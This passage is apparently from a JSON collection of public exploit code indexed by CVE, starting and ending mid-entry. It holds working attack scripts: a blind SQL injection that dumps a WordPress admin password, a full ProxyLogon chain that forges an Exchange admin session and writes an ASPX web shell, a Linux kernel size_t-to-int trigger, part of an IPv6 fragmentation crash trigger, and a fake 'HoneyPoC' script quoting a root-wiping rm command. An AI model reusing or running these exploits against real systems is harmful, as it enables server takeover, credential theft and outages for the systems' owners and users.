'+', '%2B'}\")\n end\n end\nend" - }, - { - "created_at": "2021-07-26T14:12:26Z", - "cve": "CVE-2019-10866", - "urls": [ - "https://github.com/sepehrdaddev/0day-today-exploits/blob/4c60d5a5b65e42e6f67512596926f261fa10b668/32829.txt" - ], - "exploit": "# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection\n# Exploit Author: Daniele Scanu @ Certimeter Group\n# Vendor Homepage: https://10web.io/plugins/\n# Version: 1.13.3\n# Tested on: Ubuntu 18.04\n# CVE : CVE-2019-10866\n\nimport requests\nimport time\n\nsession = requests.Session()\ndictionary = '@._-$/\\\\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'\nflag = True\nusername = \"username\"\npassword = \"password\"\ntemp_password = \"\"\nTIME = 0.5\n\ndef login(username, password):\n payload = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Login',\n 'testcookie': 1\n }\n\ndef print_string(str):\n print \"\\033c\"\n print str\n\ndef get_admin_pass():\n len_pwd = 1\n global flag\n global temp_password\n while flag:\n flag = False\n ch_temp = ''\n for ch in dictionary:\n print_string(\"[*] Password dump: \" + temp_password + ch)\n ch_temp = ch\n start_time = time.time()\n r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')\n elapsed_time = time.time() - start_time\n if elapsed_time >= TIME:\n flag = True\n break\n if flag:\n temp_password += ch_temp\n len_pwd += 1\n\nlogin(username, password)\nget_admin_pass()\nprint_string(\"[+] Password found: \" + temp_password)" - }, - { - "created_at": "2021-07-26T16:35:26Z", - "cve": "CVE-2021-22893", - "urls": [ - "https://github.com/ZephrFish/CVE-2021-22893" - ], - "exploit": "# CVE-2021-22893 RCE PoC\n# This is how dangerious not reading the source code is:\n# rm -rvf /* --no-preserve-root\n\nUSAGE=\"\nBash script to achieve 
RCE\nFlags:\n-c Target IP Address.\nusage: exploit.sh -c \nexample: exploit.sh -c 10.0.0.1\nexample: exploit.sh -l \nexample: exploit.sh -l ips.txt\n\"\nif [ $# -eq 0 ]; then\n echo \"$USAGE\"\n exit\nfi\necho \"HONEYPOC - NOT A REAL EXPLOIT\"\necho \"[!] Exploiting Host $1 $2\"\necho \"[+] Beginning Erasure of /\"\nsleep 5s\nls -aliRtu /\necho \"[!] Deleted Root File System.\"\nsleep 5s\necho \"We're no strangers to love\"\n# NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Spanish (NX)',\n# {\n# 'Ret' => 0x6fdbf727,\n# 'DisableNX' => 0x6fdc16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\necho \"You know the rules and so do I.\"\n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Finnish (NX)',\n# {\n# 'Ret' => 0x597df727,\n# 'DisableNX' => 0x597e16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 French (NX)',\n# {\n# 'Ret' => 0x595bf727,\n# 'DisableNX' => 0x595c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n echo \"A full commitment's what I'm thinking of.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Hebrew (NX)',\n# {\n# 'Ret' => 0x5940f727,\n# 'DisableNX' => 0x594116e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Hungarian (NX)',\n# {\n# 'Ret' => 0x5970f727,\n# 'DisableNX' => 0x597116e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"You wouldn't get this from any other guy.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Italian (NX)',\n# {\n# 'Ret' => 0x596bf727,\n# 'DisableNX' => 0x596c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Japanese (NX)',\n# {\n# 'Ret' => 0x567fd3be,\n# 'DisableNX' => 
0x568016e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"I just wanna tell you how I'm feeling.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Korean (NX)',\n# {\n# 'Ret' => 0x6fd6f727,\n# 'DisableNX' => 0x6fd716e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Dutch (NX)',\n# {\n# 'Ret' => 0x596cf727,\n# 'DisableNX' => 0x596d16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Gotta make you understand\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Norwegian (NX)',\n# {\n# 'Ret' => 0x597cf727,\n# 'DisableNX' => 0x597d16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Polish (NX)',\n# {\n# 'Ret' => 0x5941f727,\n# 'DisableNX' => 0x594216e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna give you up.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Portuguese - Brazilian (NX)',\n# {\n# 'Ret' => 0x596ff727,\n# 'DisableNX' => 0x597016e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Portuguese (NX)',\n# {\n# 'Ret' => 0x596bf727,\n# 'DisableNX' => 0x596c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna let you down.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Russian (NX)',\n# {\n# 'Ret' => 0x6fe1f727,\n# 'DisableNX' => 0x6fe216e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Swedish (NX)',\n# {\n# 'Ret' => 0x597af727,\n# 'DisableNX' => 0x597b16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI 
ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna run around and desert you.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Turkish (NX)',\n# {\n# 'Ret' => 0x5a78f727,\n# 'DisableNX' => 0x5a7916e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Arabic (NX)',\n# {\n# 'Ret' => 0x6fd8f807,\n# 'DisableNX' => 0x6fd917c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna make you cry.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',\n# {\n# 'Ret' => 0x5860f807,\n# 'DisableNX' => 0x586117c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Simplified (NX)',\n# {\n# 'Ret' => 0x58fbf807,\n# 'DisableNX' => 0x58fc17c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna say goodbye.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Traditional (NX)',\n# {\n# 'Ret' => 0x5860f807,\n# 'DisableNX' => 0x586117c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Czech (NX)',\n# {\n# 'Ret' => 0x6fe1f807,\n# 'DisableNX' => 0x6fe217c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna tell a lie and hurt you.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Danish (NX)',\n# {\n# 'Ret' => 0x5978f807,\n# 'DisableNX' => 0x597917c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 German (NX)',\n# {\n# 'Ret' => 0x6fd9f807,\n# 'DisableNX' => 0x6fda17c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS 
ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Greek (NX)',\n# {\n\n\necho \"[!] You should have read the source. HoneyPoC 3.0 - https://blog.zsec.uk/cve-2020-1350-honeypoc/\"" - }, - { - "created_at": "2021-07-26T16:59:10Z", - "cve": "CVE-2021-33909", - "urls": [ - "https://github.com/Liang2580/CVE-2021-33909" - ], - "exploit": "/*\n * CVE-2021-33909: size_t-to-int vulnerability in Linux's filesystem layer\n * Copyright (C) 2021 Qualys, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. 
If not, see .\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#define PAGE_SIZE (4096)\n\n#define die() do { \\\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\nstatic void\nsend_recv_state(const int sock, const char * const sstate, const char rstate)\n{\n if (sstate) {\n if (send(sock, sstate, 1, MSG_NOSIGNAL) != 1) die();\n }\n if (rstate) {\n char state = 0;\n if (read(sock, &state, 1) != 1) die();\n if (state != rstate) die();\n }\n}\n\nstatic const char * bigdir;\nstatic char onedir[NAME_MAX + 1];\n\ntypedef struct {\n pid_t pid;\n int socks[2];\n size_t count;\n int delete;\n} t_userns;\n\nstatic int\nuserns_fn(void * const arg)\n{\n if (!arg) die();\n const t_userns * const userns = arg;\n const int sock = userns->socks[1];\n if (close(userns->socks[0])) die();\n\n send_recv_state(sock, NULL, 'A');\n\n size_t n;\n if (chdir(bigdir)) die();\n for (n = 0; n <= userns->count / (1 + (sizeof(onedir)-1) * 4); n++) {\n if (chdir(onedir)) die();\n }\n char device[] = \"./device.XXXXXX\";\n if (!mkdtemp(device)) die();\n char mpoint[] = \"/tmp/mpoint.XXXXXX\";\n if (!mkdtemp(mpoint)) die();\n if (mount(device, mpoint, NULL, MS_BIND, NULL)) die();\n\n if (userns->delete) {\n if (rmdir(device)) die();\n }\n if (chdir(\"/\")) die();\n\n send_recv_state(sock, \"B\", 'C');\n\n const int fd = open(\"/proc/self/mountinfo\", O_RDONLY);\n if (fd <= -1) die();\n static char buf[1UL << 20];\n size_t len = 0;\n for (;;) {\n ssize_t nbr = read(fd, buf, 1024);\n if (nbr <= 0) die();\n for (;;) {\n const char * nl = memchr(buf, '\\n', nbr);\n if (!nl) break;\n nl++;\n if (memmem(buf, nl - buf, \"\\\\134\", 4)) die();\n nbr -= nl - buf;\n memmove(buf, nl, nbr);\n len = 0;\n }\n len += nbr;\n if (memmem(buf, nbr, \"\\\\134\", 4)) break;\n }\n\n 
send_recv_state(sock, \"D\", 'E');\n die();\n}\n\nstatic void\nupdate_id_map(char * const mapping, const char * const map_file)\n{\n const size_t map_len = strlen(mapping);\n if (map_len >= SSIZE_MAX) die();\n if (map_len <= 0) die();\n\n size_t i;\n for (i = 0; i < map_len; i++) {\n if (mapping[i] == ',')\n mapping[i] = '\\n';\n }\n\n const int fd = open(map_file, O_WRONLY);\n if (fd <= -1) die();\n if (write(fd, mapping, map_len) != (ssize_t)map_len) die();\n if (close(fd)) die();\n}\n\nstatic void\nproc_setgroups_write(const pid_t child_pid, const char * const str)\n{\n const size_t str_len = strlen(str);\n if (str_len >= SSIZE_MAX) die();\n if (str_len <= 0) die();\n\n char setgroups_path[64];\n snprintf(setgroups_path, sizeof(setgroups_path), \"/proc/%ld/setgroups\", (long)child_pid);\n\n const int fd = open(setgroups_path, O_WRONLY);\n if (fd <= -1) {\n if (fd != -1) die();\n if (errno != ENOENT) die();\n return;\n }\n if (write(fd, str, str_len) != (ssize_t)str_len) die();\n if (close(fd)) die();\n}\n\nstatic void\nfork_userns(t_userns * const userns, const size_t size, const int delete)\n{\n static const size_t stack_size = (1UL << 20) + 2 * PAGE_SIZE;\n static char * stack = NULL;\n if (!stack) {\n stack = mmap(NULL, stack_size, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);\n if (!stack || stack == MAP_FAILED) die();\n if (mprotect(stack + PAGE_SIZE, stack_size - 2 * PAGE_SIZE, PROT_READ | PROT_WRITE)) die();\n }\n\n if (!userns) die();\n userns->count = size / 2;\n userns->delete = delete;\n\n if (socketpair(AF_UNIX, SOCK_STREAM, 0, userns->socks)) die();\n userns->pid = clone(userns_fn, stack + stack_size - PAGE_SIZE, CLONE_NEWUSER | CLONE_NEWNS | SIGCHLD, userns);\n if (userns->pid <= -1) die();\n if (close(userns->socks[1])) die();\n userns->socks[1] = -1;\n\n char map_path[64], map_buf[64];\n snprintf(map_path, sizeof(map_path), \"/proc/%ld/uid_map\", (long)userns->pid);\n snprintf(map_buf, sizeof(map_buf), \"0 %ld 1\", 
(long)getuid());\n update_id_map(map_buf, map_path);\n\n proc_setgroups_write(userns->pid, \"deny\");\n snprintf(map_path, sizeof(map_path), \"/proc/%ld/gid_map\", (long)userns->pid);\n snprintf(map_buf, sizeof(map_buf), \"0 %ld 1\", (long)getgid());\n update_id_map(map_buf, map_path);\n\n send_recv_state(*userns->socks, \"A\", 'B');\n}\n\nstatic void\nwait_userns(t_userns * const userns)\n{\n if (!userns) die();\n if (kill(userns->pid, SIGKILL)) die();\n\n int status = 0;\n if (waitpid(userns->pid, &status, 0) != userns->pid) die();\n userns->pid = -1;\n if (!WIFSIGNALED(status)) die();\n if (WTERMSIG(status) != SIGKILL) die();\n\n if (close(*userns->socks)) die();\n *userns->socks = -1;\n}\n\nint\nmain(const int argc, const char * const argv[])\n{\n if (argc != 2) die();\n bigdir = argv[1];\n if (*bigdir != '/') die();\n\n if (sizeof(onedir) != 256) die();\n memset(onedir, '\\\\', sizeof(onedir)-1);\n if (onedir[sizeof(onedir)-1] != '\\0') die();\n\n puts(\"creating directories, please wait...\");\n if (mkdir(bigdir, S_IRWXU) && errno != EEXIST) die();\n if (chdir(bigdir)) die();\n size_t i;\n for (i = 0; i <= (1UL << 30) / (1 + (sizeof(onedir)-1) * 4); i++) {\n if (mkdir(onedir, S_IRWXU) && errno != EEXIST) die();\n if (chdir(onedir)) die();\n }\n if (chdir(\"/\")) die();\n\n static t_userns userns;\n fork_userns(&userns, (1UL << 31), 1);\n puts(\"crashing...\");\n send_recv_state(*userns.socks, \"C\", 'D');\n wait_userns(&userns);\n die();\n}" - }, - { - "created_at": "2021-07-26T17:20:40Z", - "cve": "CVE-2021-27065", - "urls": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065", - "https://github.com/p0wershe11/ProxyLogon" - ], - "exploit": "# -*- encoding: utf-8 -*-\n'''\n-------------------------------------------------------\n@File : ProxyLogon.py\n@Time : 2021/03/13 21:13:01\n@Version : 1.0.0\n@License : \n@Desc : \n@Author : p0wershe11, RGDZ\n-------------------------------------------------------\n'''\n\n\n\nfrom random import 
Random, randint, random\nimport re\nimport string\nimport sys\nimport json\nimport requests\nfrom urllib.parse import urlencode\nfrom struct import unpack\nfrom base64 import b64encode, b64decode\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass IOFlow(str):\n\n def __init__(self) -> None:\n super().__init__()\n self._cout = sys.stdout\n\n def _write(self, s:str):\n self.cout.write(s)\n\n def __lshift__(self, s: str)->int:\n return self._cout.write(s)\n\nendl = \"\\n\"\ncout = IOFlow()\n\nclass Color:\n START = \"\\033[\"\n END = START+\"0m\"\n \n\n C_RED = START+\"31m\"\n C_GREEN = START+\"32m\"\n C_YELLOW = START+\"33m\"\n C_BLUE = START+\"34m\"\n\n # RANDOM_COLOR = random.choice()\n\nclass Color(Color):\n ALL_COLOR = {k:v for k, v in Color.__dict__.items() if \"C_\" in k}\n _COLOR_S = lambda color, s: color+s+Color.END\n\nclass Color(Color):\n\n RED_S = lambda s: Color._COLOR_S(Color.C_RED, s)\n GREEN_S = lambda s: Color._COLOR_S(Color.C_GREEN, s)\n YELLOW_S = lambda s: Color._COLOR_S(Color.C_YELLOW, s)\n BLUE_S = lambda s: Color._COLOR_S(Color.C_BLUE, s)\n\nclass Log:\n BASE_SYM = lambda sym: f\"{sym}\"\n TEMPLATE = lambda sym, msg: cout << f\"{sym}:{msg}\\n\"\n\nclass Log(Log):\n INFO_SYM = Log.BASE_SYM(Color.BLUE_S(\"[*]\"))\n WARING_SYM = Log.BASE_SYM(Color.YELLOW_S(\"[!]\"))\n SUCCESS_SYM = Log.BASE_SYM(Color.GREEN_S(\"[+]\"))\n\nclass Log(Log):\n info = lambda msg: Log.TEMPLATE(Log.INFO_SYM, msg)\n waring = lambda msg: Log.TEMPLATE(Log.WARING_SYM, msg)\n success = lambda msg: Log.TEMPLATE(Log.SUCCESS_SYM, msg)\n\n\nARGS = [dict(v) for v in [zip(v.split(\"=\")[0::2], v.split(\"=\")[1::2]) for v in sys.argv[1:]]]\n\n\ncheck_argv = lambda arg: arg in sys.argv\n\n\n\nHOST = \"\"\nMAIL = \"\"\nMAILS = \"\"\nLOCAL_NAME = \"\"\n\nascii_letters = string.ascii_letters\nSHELL_NAME = \"\".join(ascii_letters[randint(0, len(ascii_letters)-1)] for i in 
range(10))\nFILE_PATH = f'C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\{SHELL_NAME}.aspx'\nFILE_DATA = ''\n\n\ndef _unpack_str(byte_string):\n return byte_string.decode('UTF-8').replace('\\x00', '')\n\ndef _unpack_int(format, data):\n return unpack(format, data)[0]\n\n\ndef exploit(path, qs='', data='', cookies=[], headers={}):\n global HOST, LOCAL_NAME\n\n cookies = list(cookies)\n cookies.extend([f\"X-BEResource=a]@{LOCAL_NAME}:444{path}?{qs}#~1941962753\"])\n if not headers:\n headers = {\n 'Content-Type': 'application/json'\n }\n headers['Cookie'] = ';'.join(cookies)\n headers['msExchLogonMailbox'] = 'S-1-5-20'\n\n url = f\"https://{HOST}/ecp/y.js\"\n resp = requests.post(url, headers=headers, data=data, verify=False, allow_redirects=False)\n return resp\n\ndef parse_challenge(auth):\n target_info_field = auth[40:48]\n target_info_len = _unpack_int('H', target_info_field[0:2])\n target_info_offset = _unpack_int('I', target_info_field[4:8])\n\n target_info_bytes = auth[target_info_offset:target_info_offset+target_info_len]\n\n domain_name = ''\n computer_name = ''\n info_offset = 0\n while info_offset < len(target_info_bytes):\n av_id = _unpack_int('H', target_info_bytes[info_offset:info_offset+2])\n av_len = _unpack_int('H', target_info_bytes[info_offset+2:info_offset+4])\n av_value = target_info_bytes[info_offset+4:info_offset+4+av_len]\n\n info_offset = info_offset + 4 + av_len\n if av_id == 2: # MsvAvDnsDomainName\n domain_name = _unpack_str(av_value)\n elif av_id == 3: # MsvAvDnsComputerName\n computer_name = _unpack_str(av_value)\n return domain_name, computer_name\n\ndef get_local_name():\n global LOCAL_NAME\n Log.info(\"Getting ComputerName and DomainName.\")\n ntlm_type1 = (\n b'NTLMSSP\\x00' # NTLMSSp Signature\n b'\\x01\\x00\\x00\\x00' # Message Type\n b'\\x97\\x82\\x08\\xe2' # Flags\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' # Domain String\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' # Workstation String\n 
b'\\x0a\\x00\\xba\\x47\\x00\\x00\\x00\\x0f' # OS Version\n )\n headers = {\n 'Authorization': f'Negotiate {b64encode(ntlm_type1).decode()}'\n }\n # print(headers)\n # assert False\n r = requests.get(f'https://{HOST}/rpc/', headers=headers, verify=False)\n assert r.status_code == 401, \"Error while getting ComputerName\"\n auth_header = r.headers['WWW-Authenticate']\n auth = re.search('Negotiate ([A-Za-z0-9/+=]+)', auth_header).group(1)\n domain_name, computer_name = parse_challenge(b64decode(auth))\n if not domain_name:\n Log.waring(\"DomainName not found.\")\n return exit(0)\n if not computer_name:\n Log.waring(\"ComputerName not found\")\n return exit(0)\n Log.info(f\"Domain Name = {domain_name}\")\n Log.info(f\"Computer Name = {computer_name}\")\n LOCAL_NAME = computer_name\n\n\ndef get_sid(mail):\n payload = f'''\n\n \n {mail}\n http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\n \n\n'''\n headers = {\n 'User-Agent': 'ExchangeServicesClient/0.0.0.0', \n 'Content-Type': 'text/xml'\n }\n resp = exploit('/autodiscover/autodiscover.xml', qs='', data=payload, headers=headers)\n res = re.search('(.*?)', resp.text)\n if not res:\n Log.waring(\"LegacyDN not found!\")\n return\n\n headers = {\n 'X-Clientapplication': 'Outlook/15.0.4815.1002', \n 'X-Requestid': 'x', \n 'X-Requesttype': 'Connect', \n 'Content-Type': 'application/mapi-http', \n }\n legacyDN = res.group(1)\n payload = legacyDN + '\\x00\\x00\\x00\\x00\\x00\\x20\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00'\n r = exploit('/mapi/emsmdb/', qs='', data=payload, headers=headers)\n result = re.search('with SID ([S\\-0-9]+) ', r.text)\n if not result:\n Log.waring(f\"Not Found user: {mail}\")\n return None\n sid = result.group(1)\n Log.info(f\"sid:{sid}\")\n if \"500\" not in sid.split(\"-\"):\n Log.waring(\"500 not in sid.\")\n sid = \"-\".join(sid.split(\"-\")[:-1]+[\"500\"])\n Log.info(f\"add -500, sid:{sid}\")\n return sid\n\n \n\n\ndef exp(mail_name, 
sid):\n payload = f'{sid}'\n resp = exploit('/ecp/proxyLogon.ecp', qs='', data=payload)\n Log.waring(f\"Login status code:{resp.status_code}\")\n\n session_id = resp.cookies.get('ASP.NET_SessionId')\n canary = resp.cookies.get('msExchEcpCanary')\n Log.info(f'get ASP.NET_SessionId = {session_id}')\n Log.info(f\"get msExchEcpCanary = {canary}\")\n \n extra_cookies = [\n 'ASP.NET_SessionId='+session_id, \n 'msExchEcpCanary='+canary\n ]\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n r = exploit('/ecp/DDI/DDIService.svc/GetObject', qs=qs, data='', cookies=extra_cookies)\n identity = r.json()['d']['Output'][0]['Identity']\n Log.info(f\"OAB Name = f{identity['DisplayName']}\")\n Log.info(f\"OAB ID = {identity['RawIdentity']}\")\n\n # Set-OABVirtualDirectory\n Log.info(\"Setting up webshell payload through OAB\")\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'ExternalUrl': 'http://f/' + FILE_DATA\n }\n }\n })\n r = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n assert r.status_code == 200, 'Error while setting up webshell payload'\n Log.success(\"Setting up webshell payload OK!\")\n\n # save file\n Log.info(\"Writing shell...\")\n qs = urlencode({\n 'schema': 'ResetOABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'FilePathName': FILE_PATH\n }\n }\n })\n resp = 
exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n if resp.status_code != 200:\n Log.waring(f\"Error while writing shell, status code is {resp.status_code}\")\n return\n\n\n Log.info(\"Cleaning OAB...\")\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'ExternalUrl': ''\n }\n }\n })\n resp = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n Log.info(f\"resp:{resp.status_code}\")\n Log.success(f\"shell: https://{HOST}/aspnet_client/{SHELL_NAME}.aspx\")\n\n\n\ndef run(runner):\n global HOST, MAILS\n f = open(MAILS)\n try:\n while True:\n mail = next(f)[:-1]\n return runner(mail)\n except:\n Log.waring(\"mails file has been read.\")\n\ndef runner(mail):\n get_local_name()\n sid = get_sid(mail)\n if not sid:\n return\n return exp(mail.split('@')[0], sid)\n\ndef main():\n global HOST, MAILS, MAIL, ARGS\n args = {}\n for v in ARGS:\n args.update(v)\n\n HOST = args.get(\"--host\")\n if not HOST:\n return help()\n \n MAIL=args.get(\"--mail\")\n if MAIL:\n return runner(MAIL)\n\n MAILS=args.get(\"--mails\")\n if MAILS:\n return run(runner)\n\ndef help():\n cout << f\"\"\"usage:\n python {__file__} --host=exchange.com --mail=admin@exchange.com\n python {__file__} --host=exchange.com --mails=./mails.txt\nargs:\n --host: target's address.\n --mail: exists user's mail.\n --mails: mails file.\n \"\"\"\n cout << endl\n\ndef Logo():\n return ''' \n=============================================================\n \n ___ _ \n| . \\ _ _ ___ __ _ _ | | ___ ___ ___ ._ _ \n| _/| '_>/ . \\\\ \/| | || |_ / . \/ . |/ . \\| ' |\n|_| |_| \\___//\\_\\`_. ||___|\\___/\\_. 
|\\___/|_|_|\n <___' <___' \n\n author: p0wershe11,RGDZ\n=============================================================\n'''\n\n\nif __name__ == \"__main__\":\n cout << Logo()\n main()" - }, - { - "created_at": "2021-07-26T17:22:12Z", - "cve": "CVE-2021-24086", - "urls": [ - "https://github.com/0vercl0k/CVE-2021-24086" - ], - "exploit": "# Axel '0vercl0k' Souchet - April 7 2021\nfrom scapy.all import *\nimport argparse\n\ndef frag6(target, frag_id, bytes, nh, frag_size = 1008):\n '''Ghetto fragmentation.'''\n assert (frag_size % 8) == 0\n leftover = bytes\n offset = 0\n frags = []\n while len(leftover) > 0:\n chunk = leftover[: frag_size]\n leftover = leftover[len(chunk): ]\n last_pkt = len(leftover) == 0\n # 0 -> No more / 1 -> More\n m = 0 if last_pkt else 1\n assert offset < 8191\n pkt = Ether() \\\n / IPv6(dst = target) \\\n / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \\\n / chunk\n\n offset += (len(chunk) // 8)\n frags.append(pkt)\n return frags\n\ndef pull_the_trigger(args):\n '''Trigger CVE-2021-24086 patched in REL2102.'''\n frag_id = random.randint(0, 0xffffffff)\n second_pkt_id = (~frag_id & 0xffffffff)\n reassembled_pkt = IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / 